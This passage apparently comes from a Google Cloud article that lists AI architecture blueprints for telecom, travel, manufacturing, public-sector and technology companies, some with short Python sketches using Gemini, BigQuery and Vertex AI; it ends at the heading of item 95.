Tech stack: Dataflow, BigQuery, Vertex AI, Looker.
Blueprint: Data from all source systems is streamed via Dataflow into BigQuery, which acts as the central data warehouse. ➝ Vertex AI models analyze the unified data to identify patterns, such as a customer experiencing poor network quality in a specific location. ➝ The system can then create an actionable insight, like “This customer is at high risk of churn due to repeated dropped calls.” ➝ This insight is surfaced to a customer service agent via a Looker dashboard, prompting them to proactively reach out with a solution, like offering a network extender.
58. Enable natural language chat for complex IoT data
Business challenge: You’re an Internet of Things (IoT) provider for commercial clients, collecting millions of data points from sensors and devices. Your challenge is that non-technical users, like fleet managers or building operators, cannot easily access or understand this complex data to get the insights they need.
Tech stack: BigQuery, Vertex AI, Looker (or another BI tool).
Blueprint: All IoT data is streamed and stored in BigQuery. ➝ The data is exposed through a BI tool like Looker with an embedded natural language chat interface. ➝ A non-technical user asks a question in plain English, such as “Which of our vehicles have been idling for more than 30 minutes today in the downtown area?” ➝ The request is sent to Gemini, which understands the user’s intent and translates the question into a SQL query. ➝ The query is run against BigQuery, and the results are returned as a simple table or map directly in the chat interface, reducing time-to-insight by 88%.
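A minimal text-to-SQL sketch of the same idea; the schema hint, table name, and project settings are assumptions, and a production system would validate or dry-run the generated SQL before executing it.

```python
# Sketch: translate a plain-English question into BigQuery SQL with Gemini, then run it.
import vertexai
from google.cloud import bigquery
from vertexai.generative_models import GenerativeModel

SCHEMA_HINT = """
Table iot.vehicle_events(vehicle_id STRING, event_time TIMESTAMP,
                         status STRING, idle_minutes FLOAT64, zone STRING)
"""  # hypothetical schema exposed to the model


def answer(question: str):
    vertexai.init(project="my-project", location="us-central1")
    model = GenerativeModel("gemini-1.5-pro")
    prompt = (
        "You translate questions into BigQuery SQL. Use only this schema:\n"
        + SCHEMA_HINT +
        "\nReturn a single SQL statement and nothing else.\nQuestion: " + question
    )
    sql = model.generate_content(prompt).text
    # Strip any markdown fences the model may add; validate/dry-run before use in production.
    sql = sql.strip().removeprefix("```sql").removeprefix("```").removesuffix("```").strip()
    return list(bigquery.Client().query(sql).result())


rows = answer("Which of our vehicles have been idling for more than 30 minutes "
              "today in the downtown area?")
```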
59. Deliver AI services on a distributed cloud for data sovereignty
Business challenge: You’re a multinational telecom operator serving countries with strict data residency laws. Your challenge is to leverage powerful AI capabilities, like real-time translation, while ensuring that local customer data never leaves the country of origin.
Tech stack: Google Distributed Cloud, Vertex AI, Speech-to-Text, Text-to-Speech.
Blueprint: An instance of Google Distributed Cloud (GDC) is deployed within the local country’s data center. ➝ A user makes a call that requires real-time translation. ➝ The audio stream is processed entirely within the GDC environment. ➝ Speech-to-Text and Text-to-Speech services, along with Vertex AI translation models running on GDC, handle the translation. ➝ The translated audio is sent back to the user with super-low latency, delivering the AI service while guaranteeing all data remains in-country to comply with sovereignty regulations.
60. Accelerate cybersecurity threat detection and response
Business challenge: You’re a critical infrastructure provider, and you face a constant barrage of sophisticated cyber threats. Your challenge is detecting and investigating these threats fast enough to prevent breaches, a task that is difficult for human analysts to manage at scale.
Tech stack: Google Security Operations (SecOps), Gemini in Security.
Blueprint: Security logs and telemetry from across the entire organization are ingested into the Google Security Operations platform. ➝ The platform’s AI capabilities automatically correlate signals to detect potential threats that a human might miss. ➝ When a high-priority event is detected, a security analyst can use the integrated Gemini in Security to ask, “Summarize this threat. What is the potential impact, and what is the recommended remediation?” ➝ Gemini provides a concise summary and a step-by-step playbook, allowing the analyst to close investigations faster.
61. Establish data-driven AI security governance
Business challenge: You’re a large enterprise with thousands of internal developers and data scientists building AI models. Your challenge is establishing a robust governance layer to ensure that all AI development is secure, compliant, and data-driven without stifling innovation.
Tech stack: Vertex AI, BigQuery, open-source tools (e.g., for model scanning), IAM.
Blueprint: All AI model development is done within Vertex AI. ➝ As models are built, their metadata, training data sources, and dependencies are automatically logged in BigQuery. ➝ Automated security tools scan models for vulnerabilities. ➝ A governance dashboard provides a single view of all AI projects, showing compliance status and data lineage. ➝ IAM policies enforce rules, such as “a model cannot be deployed to production if it was trained on unapproved customer data,” creating a robust, data-driven governance framework.
These architectural blueprints are inspired by customers who are using AI in the hospitality and travel industry, such as: Alaska Airlines, Gymshark, Priceline, Six Flags, Studiosus Reisen, trivago, and more.
62. Build a conversational AI travel agent
Business challenge: You’re an airline or online travel agency. Your challenge is that traditional booking websites with complex filters and forms can be frustrating and impersonal for travelers who just want to ask a simple question, leading to abandoned searches and lost bookings.
Tech stack: Vertex AI, Cloud Run, backend booking system APIs.
Blueprint: A traveler interacts with a chatbot on the website or app, asking, “I want to fly from Seattle to Miami next month for about $400.” ➝ The request is sent to a service on Cloud Run, which uses Vertex AI Agent Builder to understand the user’s intent and extract entities (origin, destination, date, price). ➝ The service calls the airline’s booking APIs to find matching flights. ➝ The flight options are passed to Gemini with a prompt like, “Here are three flights. Present them in a friendly, conversational way and ask the user which one they prefer.” ➝ The chatbot presents the options, streamlining the booking process into a simple conversation.
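A sketch of the Cloud Run service's core logic; the search_flights callable stands in for the airline's booking API, and the extracted JSON field names are assumptions.

```python
# Sketch: extract structured search criteria from free text, query the booking API,
# then have Gemini present the options conversationally.
import json
import vertexai
from vertexai.generative_models import GenerationConfig, GenerativeModel

vertexai.init(project="my-project", location="us-central1")  # placeholders
model = GenerativeModel("gemini-1.5-flash")


def handle_message(user_message: str, search_flights) -> str:
    # 1) Turn free text into structured search parameters.
    extraction = model.generate_content(
        "Extract origin, destination, month, and max_price_usd from this request. "
        "Return JSON only.\n\n" + user_message,
        generation_config=GenerationConfig(response_mime_type="application/json"),
    )
    criteria = json.loads(extraction.text)

    # 2) Query the airline's own booking API (placeholder callable).
    flights = search_flights(**criteria)

    # 3) Ask Gemini to present the options in a friendly, conversational way.
    reply = model.generate_content(
        "Here are flight options as JSON. Present them conversationally and ask "
        "which one the user prefers.\n\n" + json.dumps(flights)
    )
    return reply.text
```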
63. Create an in-park digital assistant for theme parks
Business challenge: You’re a theme park or large entertainment venue operator. Your challenge is that guests can feel overwhelmed trying to navigate the park, find showtimes, and check ride wait times, which can detract from their overall experience.
Tech stack: Google Maps Platform, Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time park data (ride wait times, show schedules, character locations) is streamed into BigQuery. ➝ A guest opens the park’s mobile app and asks the digital assistant, “What’s a fun ride with a wait time under 20 minutes near me?” ➝ The app sends the request and the user’s location to a service on Cloud Run. ➝ The service queries BigQuery for current wait times and uses the Google Maps Platform to find nearby attractions. ➝ Gemini synthesizes this information to provide a personalized recommendation, such as, “The Goliath roller coaster is a 5-minute walk from you and has a 15-minute wait!”
64. Build predictive tools for food orders and loyalty
Business challenge: You’re a quick-service restaurant or pizza chain. Your challenge is managing inventory and kitchen prep time effectively during peak hours while also encouraging repeat business through generic loyalty programs that often fail to engage customers.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: All historical order data is stored in BigQuery. ➝ Vertex AI forecasting models analyze this data to predict order volumes for specific times and locations (e.g., “Predict a 30% spike in pepperoni pizza orders in downtown locations on Friday night”). ➝ When a loyalty member opens the app, a service on Cloud Run retrieves their order history and sends it to Gemini with a prompt like, “This user frequently orders on Tuesdays. Create a personalized offer for a free side item with their next Tuesday order.” ➝ This predictive prep and personalized marketing increases efficiency and customer loyalty.
65. Enable natural language search for accommodations
Business challenge: You’re a hotel booking platform or vacation rental site. Your challenge is that users often have specific, nuanced needs (like “a quiet hotel near the beach with a pool for kids”) that are difficult to express using standard check-box filters.
Tech stack: Vertex AI Search, BigQuery.
Blueprint: Detailed data for millions of hotel listings, including amenities, reviews, and location info, is indexed from BigQuery into Vertex AI Search. ➝ A user types a free-text query like, “Find me a pet-friendly hotel in downtown Austin with a rooftop bar for under $300 a night.” ➝ Vertex AI Search processes the natural language to understand the multiple intents (pet-friendly, location, amenity, price). ➝ The engine returns a ranked list of hotels that best match all the specified criteria, creating a more intuitive and personalized search experience.
66. Create an AI-driven virtual fitness coach
Business challenge: You’re a fitness brand or gym, and your customers want personalized training plans. Your challenge is that providing one-on-one human coaching is expensive and doesn’t scale, leaving most members with generic, one-size-fits-all workout programs.
Tech stack: Vertex AI, a mobile application, wearable device integration.
Blueprint: A user inputs their fitness goals and performs a series of assessment exercises, which are recorded through their phone’s camera. ➝ A computer vision model on Vertex AI analyzes the video to assess form and fitness level. ➝ This data, along with input from their wearable device, is sent to a Gemini model with a prompt like, “Create a 4-week progressive fitness program for a user with intermediate strength whose goal is fat loss.” ➝ The AI generates a hyper-personalized daily workout program, acting as a virtual trainer that adapts over time based on the user’s performance.
67. Personalize advertising campaigns at scale
Business challenge: You’re a global hotel group, and you need to run advertising campaigns across many different regions and customer segments. Your challenge is creating ad copy and imagery that resonates with each specific audience, a task that is slow and difficult to scale manually.
Tech stack: BigQuery, Vertex AI, Google Ads API.
Blueprint: Customer and campaign performance data is consolidated in BigQuery. ➝ The marketing team defines a new campaign with a target audience, such as “families looking for a summer vacation in Spain.” ➝ A service sends this context to Gemini with a prompt like, “Generate 5 different ad headlines and descriptions for a family-friendly hotel in Barcelona, highlighting the pool and proximity to attractions.” ➝ Gemini creates multiple ad variations, which are then automatically pushed to the Google Ads API to create a highly targeted and personalized campaign, boosting ad team productivity and revenue.
68. Automate data governance for airline operations
Business challenge: You’re a major airline dealing with petabytes of data from dozens of systems, from flight operations to customer loyalty. Your challenge is managing and governing this data, as manually classifying tables and managing metadata is a massive, costly, and error-prone undertaking.
Tech stack: BigQuery, Gemini, Dataplex.
Blueprint: As new data tables are created in BigQuery, a process is triggered. ➝ The table schema and sample data are sent to a Gemini model with a prompt like, “Analyze this table and generate a business-friendly description, assign data quality rules, and classify any columns that contain PII.” ➝ The model returns structured metadata. ➝ This metadata is used to automatically populate the Dataplex data catalog, ensuring all data is properly documented, classified, and governed without significant manual effort.
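A sketch of the metadata-generation step; the JSON keys are illustrative, and pushing the result into the Dataplex catalog is omitted because that wiring is environment-specific.

```python
# Sketch: describe a BigQuery table with Gemini using its schema and a few sample rows.
import json
import vertexai
from google.cloud import bigquery
from vertexai.generative_models import GenerationConfig, GenerativeModel

bq = bigquery.Client()
vertexai.init(project="my-project", location="us-central1")  # placeholders
model = GenerativeModel("gemini-1.5-pro")


def describe_table(table_id: str) -> dict:
    table = bq.get_table(table_id)
    schema = [{"name": f.name, "type": f.field_type} for f in table.schema]
    sample = [dict(r) for r in bq.list_rows(table, max_results=5)]

    prompt = (
        "Analyze this table and generate a business-friendly description, "
        "suggest data quality rules, and classify any columns that contain PII. "
        "Return JSON with keys 'description', 'quality_rules', 'pii_columns'.\n\n"
        f"Schema: {json.dumps(schema)}\nSample rows: {json.dumps(sample, default=str)}"
    )
    response = model.generate_content(
        prompt,
        generation_config=GenerationConfig(response_mime_type="application/json"),
    )
    return json.loads(response.text)  # push this into the Dataplex catalog entry
```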
69. Triage global security alerts for traveler safety
Business challenge: You’re a tour operator responsible for the safety of thousands of travelers around the world. Your challenge is monitoring and filtering a high volume of global security alerts to identify the ones that pose an actual, immediate risk to your specific customers.
Tech stack: Vertex AI, Pub/Sub, a traveler itinerary database.
Blueprint: A stream of global security alerts from various news and government sources flows into Pub/Sub. ➝ For each alert, a function is triggered that retrieves the location and topic. ➝ The function queries the itinerary database to see if any travelers are currently in the affected area. ➝ If there are, the alert text is sent to Gemini with a prompt like, “Based on this alert about a protest in Paris, classify the risk level for a tourist located 5 miles away as ‘Low’, ‘Medium’, or ‘High’.” ➝ The classified alert appears on a security dashboard, allowing the team to ignore low-risk noise and focus only on credible threats, reducing manual effort.
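One possible shape for the per-alert function, assuming alerts arrive as JSON Pub/Sub messages; the travelers_near lookup and the message fields are hypothetical placeholders.

```python
# Sketch: Pub/Sub-triggered function that classifies an alert's risk with Gemini.
import base64
import json
import functions_framework
import vertexai
from vertexai.generative_models import GenerativeModel

vertexai.init(project="my-project", location="us-central1")  # placeholders
model = GenerativeModel("gemini-1.5-flash")


def travelers_near(location: str) -> list:
    """Placeholder: query the itinerary database for travelers in the affected area."""
    return []


@functions_framework.cloud_event
def classify_alert(cloud_event):
    alert = json.loads(base64.b64decode(cloud_event.data["message"]["data"]))
    affected = travelers_near(alert["location"])
    if not affected:
        return  # no customers on the ground, so the alert is low-priority noise

    verdict = model.generate_content(
        "Based on this alert, classify the risk for a tourist located nearby as "
        "'Low', 'Medium', or 'High'. Answer with one word.\n\n" + alert["text"]
    ).text.strip()
    print(f"{alert['location']}: {verdict} risk for {len(affected)} travelers")
```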
70. Streamline guest services with an AI data analyst
Business challenge: You’re a property manager for vacation rentals or corporate housing. Your challenge is that new arrivals frequently call with the same set of questions (e.g., “What’s the wifi password?”, “How does the thermostat work?”), overwhelming your support staff.
Tech stack: Gemini for Google Workspace, a call logging system.
Blueprint: All support call logs and transcripts are consolidated into a central Google Sheet. ➝ A manager uses the integrated Gemini feature with a prompt like, “Analyze all the calls from the last 30 days and identify the top 5 most common questions asked by new arrivals.” ➝ Gemini analyzes the text and returns a summary, revealing that “Wifi password” is the most common issue. ➝ The business can then take proactive steps, like sending a more prominent welcome email with the wifi details, leading to a reduction in these repetitive calls.
71. Generate AI-powered video ad content
Business challenge: You’re an airline’s marketing team, and you need a constant stream of fresh video content to promote various destinations for in-flight entertainment and online ads. Your challenge is that traditional video production is expensive and time-consuming.
Tech stack: Google’s Veo, Vertex AI.
Blueprint: The marketing team identifies a destination to promote, for example, “Kyoto in autumn.” ➝ They use Gemini to brainstorm concepts and generate a script, with a prompt like, “Create a 30-second video script about the serene beauty of Kyoto’s temples during autumn.” ➝ This script, along with reference images and style guides, is then fed into Veo, Google’s generative video model. ➝ Veo generates a high-quality video clip based on the text and image prompts, allowing the team to create new, compelling ad content in a fraction of the time and cost of a traditional film shoot.
These architectural blueprints are inspired by customers who are using AI in the manufacturing, industrial and electronics industry, such as: Motorola, AES, Broadcom, COI Energy, Bayer Crop Science, and more.
72. Build a better, more responsive AI home companion robot
Business challenge: You’re a consumer electronics manufacturer looking to create a next-generation smart home product. Your challenge is moving beyond simple voice commands to create a truly helpful home companion that can understand natural conversation and interact intelligently with its environment.
Tech stack: Vertex AI, on-device AI models, Google Home APIs.
Blueprint: The home robot (“Max”) captures a user’s command through its on-device microphones and transcribes it via the Speech-to-Text API. ➝ The user’s request is sent to a Gemini model, which understands the conversational context and intent. ➝ If the request is to control a smart home device (e.g., “turn on the living room lights”), Gemini sends the appropriate command to the Google Home Platform APIs. ➝ Gemini generates a natural language response (e.g., “Okay, I’ve turned the lights on for you.”), which is converted to audio via the Text-to-Speech API and played through the robot’s speakers.
73. Create an AI-powered product recommendation agent
Business challenge: You’re a manufacturer of consumer products with a wide and varied catalog, like gardening supplies. Your challenge is that customers are often novices and don’t know which specific product is right for their needs, leading to confusion and lost sales.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Your entire product catalog, along with expert knowledge and guides, is indexed into Vertex AI Agent Builder from a source like BigQuery. ➝ A customer interacts with the AI agent on your website, asking, “My lawn has brown patches and I live in Texas. What should I do?” ➝ The agent understands the user’s intent and location. ➝ The retrieved product information and user query are sent to Gemini to generate a helpful, step-by-step answer, such as “It sounds like you have a grub problem, common in Texas this time of year. I recommend our product, and here’s how to apply it…”, guiding the customer to the correct purchase.
74. Automate industrial safety audits with AI
Business challenge: You’re a global energy or manufacturing company, and conducting safety audits across dozens of facilities is a slow, manual, and expensive process. Your challenge is to streamline these audits to ensure compliance and safety without incurring massive costs and operational downtime.
Tech stack: Vertex AI, Google Cloud Storage, a mobile application.
Blueprint: An auditor on-site uses a mobile app to take photos and videos of equipment, which are uploaded to Google Cloud Storage. ➝ Vertex AI Vision analyzes the imagery to identify equipment and check for visual compliance (e.g., “is the safety guard in place?”). ➝ The visual data, along with text from checklists, is fed to a Gemini model that has been trained on the company’s safety protocols. ➝ The model automatically generates a complete audit report, flagging non-compliant items and citing the specific safety rule, reducing a two-week process to one hour.
75. Automate sales quotes for configurable products
Business challenge: You’re a manufacturer of configurable products like solar panel systems. Your challenge is that creating an accurate quote is a slow, manual process requiring an expert to assess customer-specific variables (like roof size), which creates a bottleneck in your sales process.
Tech stack: Google Maps Platform, Vertex AI, Document AI.
Blueprint: A prospective customer provides their address. ➝ A service calls the Google Maps Aerial View API to get high-resolution imagery of the property’s roof. ➝ This imagery is analyzed by a Vertex AI model to measure the roof’s dimensions and identify obstructions. ➝ The system calculates the optimal number of solar panels and generates a quote. ➝ If the customer uploads a utility bill via Document AI, the system can even calculate potential savings, delivering a complete, accurate quote in 15 minutes instead of two hours.
76. Democratize data access with a natural language to SQL agent
Business challenge: You’re a large manufacturing enterprise with valuable data locked away in complex databases. Your challenge is that only a small number of technical employees can write SQL queries, creating a bottleneck and preventing business users from getting the insights they need.
Tech stack: BigQuery, Vertex AI, Looker or another BI tool.
Blueprint: All critical company data (e.g., SAP Materials data) is consolidated into BigQuery. ➝ An employee uses an internal BI tool and types a natural language question, such as “What was our total pulp production in Q2 for the southern region, and how does that compare to Q1?” ➝ The question is sent to a Gemini model that has been trained on the company’s BigQuery schema. ➝ The model translates the natural language question into an accurate SQL query. ➝ The query is automatically run against BigQuery, and the results are returned and visualized for the employee, removing the SQL bottleneck and reducing time-to-insight.
77. Build an AI-powered agricultural insights platform
Business challenge: You’re a company in the agricultural science sector. Your challenge is helping farmers move from traditional farming methods to a more data-driven approach, enabling them to increase yields and operate more sustainably in the face of changing climate conditions.
Tech stack: BigQuery, Vertex AI, Google Earth Engine, IoT sensors.
Blueprint: Data from on-farm IoT sensors, satellite imagery from Google Earth Engine, and weather data are all consolidated into BigQuery. ➝ Vertex AI models analyze this multi-layered dataset to generate hyper-local insights for a specific field. ➝ A farmer receives a recommendation on their device, such as “Your soil moisture in Section B is 15% below optimal. Based on the 7-day forecast, I recommend irrigating with 1 inch of water tomorrow morning to maximize yield.”
78. Embed on-device AI for frontline worker efficiency
Business challenge: You’re a manufacturer of specialized hardware, like mobile computing devices for retail workers. You want to differentiate your product by providing intelligent, built-in features that help frontline workers make better, faster decisions on the job.
Tech stack: On-device AI models (e.g., Gemini Nano), Vertex AI, a device management platform.
Blueprint: A retail worker scans a shelf with their device. ➝ An on-device computer vision model recognizes the products and counts the inventory. ➝ The device compares the count to the store’s inventory data and identifies a low-stock item. ➝ A lightweight, on-device model generates an alert and a suggested action, such as “Only 2 units of ‘Product X’ left on the shelf. The backroom has 25. Suggest creating a restocking task,” empowering the worker to prevent a stockout in the moment.
79. Forecast energy grid CO2 intensity with AI
Business challenge: You’re an energy transmission provider committed to sustainability. Your challenge is understanding and predicting the real-time carbon intensity of your electricity grid, which is necessary to optimize the use of renewables and reduce overall emissions.
Tech stack: Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time data on energy generation from all sources (solar, wind, gas, coal) is streamed into BigQuery. ➝ A Vertex AI forecasting model analyzes this data, along with weather forecasts, to predict the CO2 intensity of the grid for the next 24 hours. ➝ A service on Cloud Run exposes this forecast via an API. ➝ This allows the grid operator to make smarter decisions, like scheduling high-demand industrial processes for times when renewable energy is plentiful and CO2 intensity is lowest.
80. Identify and monetize underutilized energy capacity
Business challenge: You’re an energy services company focused on grid stability and social equity. Your challenge is identifying small pockets of underutilized energy capacity across thousands of commercial buildings that could be aggregated and redirected to benefit communities in need.
Tech stack: BigQuery, Vertex AI, IoT smart meters.
Blueprint: Data from IoT smart meters in commercial buildings is streamed into BigQuery. ➝ Vertex AI models analyze the energy consumption patterns of thousands of buildings to identify “underutilized capacity,” for example, an office building that consistently uses 20% less power on Friday afternoons. ➝ The system aggregates these small, distributed energy “assets.” ➝ This aggregated capacity can then be offered to utilities to stabilize the grid or provided as energy credits to low-income households, creating a new, equitable energy economy.
81. Automate customer onboarding in the energy sector
Business challenge: You’re an energy company, and signing up new customers is a manual process that involves processing documents like previous utility bills and personal IDs. Your challenge is to automate this workflow to make onboarding faster, reduce fraud, and improve the customer experience.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A new customer uploads a photo of their old utility bill and their driver’s license to your website. ➝ The files are sent to a service on Cloud Run, which uses Document AI to extract structured data from both documents. ➝ The service calls a Gemini Flash model with a prompt like, “Does the name and address on this utility bill match the name and address on this driver’s license?” ➝ Upon receiving a positive confirmation, the system automatically creates the new customer account, completing the onboarding and verification process in seconds.
These architectural blueprints are based on the incredible results customers in the public sector and nonprofits are seeing from using AI. Customers include Alma, Beyond 12, Bower, Climate Ride, Code Path, Pepperdine University and more.
82. Build a conversational coach for student success
Business challenge: You’re a nonprofit or educational institution focused on helping first-generation students from under-resourced communities succeed in college. Your challenge is providing personalized, scalable coaching that can address each student’s unique history and goals without making them feel compared to others.
Tech stack: Vertex AI, BigQuery, a student-facing mobile app.
Blueprint: A student’s academic history, goals, and previous interactions are stored in BigQuery. ➝ When the student interacts with the AI coach in their app, their query is sent to a service that retrieves their personal context from BigQuery. ➝ This history and the student’s question are sent to a Gemini model with a prompt like, “This student is feeling overwhelmed with their chemistry class. Based on their goal of becoming a nurse, provide an encouraging response and suggest two specific campus resources that can help.” ➝ The AI delivers a personalized, empathetic response, acting as a scalable mentor.
83. Create an AI assistant for legal aid and immigration
Business challenge: You’re a legal aid nonprofit. Your challenge is that clients are often overwhelmed by complex legal documents and don’t know what their next steps are, while your staff has limited bandwidth to provide one-on-one guidance for every query.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: An asylum seeker uses their phone to take a picture of a legal letter they received. ➝ The image is uploaded to a service on Cloud Run, which sends it to Document AI to extract all the text and key entities like dates and case numbers. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “Based on this legal notice, explain what it means in simple terms and list the top 3 most important next steps the recipient should take.” ➝ The app displays the simplified explanation and actionable guidance, empowering the user to navigate the complex legal process.
84. Develop an SMS chatbot for public benefits applications
Business challenge: You’re a government agency or nonprofit administering a public benefits program like SNAP. Your challenge is that the application process is often complex and confusing, creating a barrier for eligible individuals and families who need assistance.
Tech stack: Vertex AI, SMS API, a benefits eligibility database.
Blueprint: A person sends a text message like “FOOD” to a designated number. ➝ The SMS API receives the message and forwards it to a Vertex AI Conversation agent. ➝ The agent initiates a conversation, asking simple, conversational questions to determine eligibility (e.g., “How many people are in your household?”). ➝ Based on the user’s responses, the agent checks the eligibility database. ➝ The chatbot provides an immediate response, such as “Based on your answers, you are likely eligible for SNAP benefits. Would you like me to help you start the application?”, turning a multi-day process into minutes.
85. Create a digital case manager to assist social workers
Business challenge: You’re a nonprofit where caseworkers are responsible for large caseloads. Your challenge is that these workers spend dozens of hours per week on administrative tasks like writing action plans and summaries, taking time away from direct, high-impact work with beneficiaries.
Tech stack: Vertex AI, a case management system (e.g., Salesforce), Cloud Functions.
Blueprint: A caseworker finishes a meeting with a beneficiary. ➝ The notes from the meeting are saved in their case management system, which triggers a Cloud Function. ➝ The function retrieves the new notes along with the beneficiary’s entire case history. ➝ This information is sent to a Gemini model with a prompt like, “Based on this beneficiary’s history and the notes from today’s meeting, draft a detailed action plan for the next 30 days.” ➝ The AI-generated draft plan is automatically added to the case file, ready for the caseworker to review and approve, saving them hours of writing.
86. Accelerate grant writing for nonprofits
Business challenge: You’re a nonprofit that relies on grant funding to operate. Your challenge is that grant writing is a time-consuming, repetitive process that pulls your small team away from delivering on your core mission.
Tech stack: Gemini for Google Workspace.
Blueprint: A grant writer opens a Google Doc using a template for a new grant proposal. ➝ The template contains standard sections like “Organization History,” “Mission Statement,” and “Program Budget.” ➝ For a repetitive section, the writer uses the integrated Gemini feature with a prompt like, “Write a 200-word summary of our organization’s mission, based on our website and past proposals.” ➝ Gemini generates the text, filling in the routine information instantly. ➝ This allows the grant writer to focus their time and creativity on the unique, strategic parts of the proposal, cutting grant-writing time.
87. Build a platform to match talent with job opportunities
Business challenge: You’re a government agency or nonprofit focused on workforce development. Your challenge is connecting qualified candidates, especially those from non-traditional backgrounds, with relevant job opportunities in the private sector efficiently and at scale.
Tech stack: Vector Search, BigQuery, Cloud Run.
Blueprint: Job seekers and employers create profiles on the platform, and the data is stored in BigQuery. ➝ Candidate skills and job requirements are converted into vector embeddings and indexed in Vector Search. ➝ When a new job is posted, the system uses Vector Search to find the top candidate profiles with the most similar embeddings. ➝ For each match, Gemini can be used to generate a personalized pitch, such as “This candidate seems like a strong fit for your ‘Software Engineer’ role because their project experience in ‘X’ aligns with your need for ‘Y’.”
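A sketch of the matching step, assuming candidate profile embeddings are already indexed in a deployed Vector Search index; the index endpoint name, deployed index ID, and embedding model are assumptions.

```python
# Sketch: embed a job description and retrieve the nearest candidate profiles.
import vertexai
from google.cloud import aiplatform
from vertexai.language_models import TextEmbeddingModel

vertexai.init(project="my-project", location="us-central1")  # placeholders
embedder = TextEmbeddingModel.from_pretrained("text-embedding-004")
index_endpoint = aiplatform.MatchingEngineIndexEndpoint(
    "projects/my-project/locations/us-central1/indexEndpoints/1234567890"
)


def match_candidates(job_description: str, k: int = 10):
    query_vector = embedder.get_embeddings([job_description])[0].values
    neighbors = index_endpoint.find_neighbors(
        deployed_index_id="candidate_profiles",  # hypothetical deployed index
        queries=[query_vector],
        num_neighbors=k,
    )
    # Each neighbor ID maps back to a candidate profile stored in BigQuery.
    return [(n.id, n.distance) for n in neighbors[0]]
```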
88. Enhance government transparency with a citizen chatbot
Business challenge: You’re a local government or county office. Your challenge is providing residents with quick and accurate answers to their questions, as your small staff can get overwhelmed with calls, and information on your website can be hard to find.
Tech stack: Vertex AI Search, Cloud Run.
Blueprint: All public county documents, meeting minutes, and website pages are indexed into Vertex AI Search. ➝ A resident visits the county website and uses a chatbot to ask, “When is the next town hall meeting about the new park?” ➝ The query is sent to a service on Cloud Run, which passes it to Vertex AI Search. ➝ The system finds the relevant information from the indexed documents and provides a direct answer with a link to the source. ➝ This empowers residents with self-service access to information and frees up county staff.
89. Use AI to improve tax collection and auditing
Business challenge: You’re a municipal finance office responsible for tax collection. Your challenge is ensuring that tax classifications on invoices are correct, as manual audits can only cover a tiny fraction of submissions, leading to significant lost revenue from misclassifications.
Tech stack: Document AI, Vertex AI, BigQuery.
Blueprint: When a company submits an invoice, it is automatically processed by Document AI to extract the service descriptions and declared tax category. ➝ The extracted data is stored in BigQuery. ➝ A Vertex AI classification model, trained on historical data of correct and incorrect classifications, analyzes the service description from the new invoice. ➝ If the model predicts a different category than the one declared by the taxpayer (e.g., it classifies a “consulting” service as “software development,” which has a higher tax rate), the invoice is flagged for human review, improving accuracy and tax collection.
90. Detect and combat misinformation at scale
Business challenge: You’re a nonprofit fact-checking organization. Your challenge is the sheer volume of new information being published every second, making it impossible for your human fact-checkers to monitor everything and identify which claims need to be addressed most urgently.
Tech stack: Pub/Sub, Vertex AI, Cloud Functions.
Blueprint: A constant stream of content from news sites and social media APIs flows into Pub/Sub. ➝ A Cloud Function is triggered for each new piece of content. ➝ The content is sent to a Gemini model with a prompt like, “Analyze this news article. Identify any verifiable claims and check them against our database of known misinformation. Flag any new, rapidly spreading, or potentially harmful claims.” ➝ The system automatically filters out noise and surfaces a prioritized list of new, high-impact claims for human fact-checkers to investigate, allowing them to focus their efforts where it matters most.
91. Accelerate discovery of hidden objects
Business challenge: You’re a scientific institute. Your challenge is finding “hidden” objects like asteroids in massive astronomical datasets, a task that is like finding a needle in a haystack for human researchers.
Tech stack: BigQuery, Vertex AI, Google Cloud Storage.
Blueprint: Petabytes of astronomical image data from telescope surveys are stored in Google Cloud Storage and cataloged in BigQuery. ➝ A Vertex AI computer vision model is trained to recognize the faint, tell-tale signs of moving objects against the background of stars. ➝ The model is run on the entire historical dataset, analyzing images that have already been reviewed by humans. ➝ The AI flags potential new asteroid discoveries that were missed by previous methods, which are then presented to astronomers for verification, dramatically accelerating the rate of discovery.
These architectural blueprints are inspired by customers who are using AI in the technology industry, such as: Personal AI, Causal, Abstrakt, BMC, Snap, Augment, Box, Twilio, and more.
92. Build a personal AI that learns from your data
Business challenge: You’re a technology company aiming to create a truly personal AI assistant. Your challenge is moving beyond generic, one-size-fits-all models to create an AI that is trained exclusively on an individual’s own data, facts, and opinions, ensuring privacy and a perfectly tailored experience.
Tech stack: Vertex AI, Google Cloud Storage, Cloud Run.
Blueprint: A user uploads their personal data (documents, emails, notes) to a secure Google Cloud Storage bucket. ➝ A fine-tuning job is initiated on Vertex AI, training a baseline Gemini model exclusively on this personal data corpus. ➝ The resulting “personal language model” is deployed to a secure endpoint on Cloud Run. ➝ When the user interacts with their personal AI, their queries are sent only to their own custom model, allowing it to provide responses that reflect their unique knowledge, style, and memory.
93. Create an AI-powered financial planning wizard
Business challenge: You’re a fintech company providing financial planning software for startups. Your challenge is that new users often struggle with the initial setup, which requires connecting disparate data sources and building complex financial models from scratch.
Tech stack: Vertex AI, BigQuery, connections to third-party data source APIs.
Blueprint: A new user signs up and grants access to their financial data sources (e.g., accounting software, bank accounts). ➝ An AI wizard ingests the data into BigQuery. ➝ The wizard sends the consolidated data to Gemini with a prompt like, “Analyze this company’s financial data. Identify key revenue streams, cost centers, and growth patterns, then generate a standard three-statement financial model.” ➝ Gemini generates the baseline model, which is then presented to the user, turning a multi-hour setup process into minutes.
94. Develop a sales co-pilot to help B2B sellers
Business challenge: You’re a B2B sales technology company. Your challenge is helping sales representatives navigate complex organizational data to find the right insights to close deals, a process that often involves manually sifting through CRM data, past deals, and product documentation.
Tech stack: Vertex AI, BigQuery, CRM integration.
Blueprint: All of a company’s sales data—CRM records, past deals, and product information—is consolidated in BigQuery and indexed into Vertex AI Search. ➝ A salesperson preparing for a call uses a co-pilot and asks, “I’m about to call a prospect in the manufacturing industry. Give me key talking points, relevant case studies, and potential objections.” ➝ The co-pilot uses Vertex AI Search to find the most relevant information. ➝ Gemini synthesizes this data into a concise briefing document, empowering the salesperson to have a more strategic and effective conversation.
95. Build an AI agent to transcribe and analyze meetings
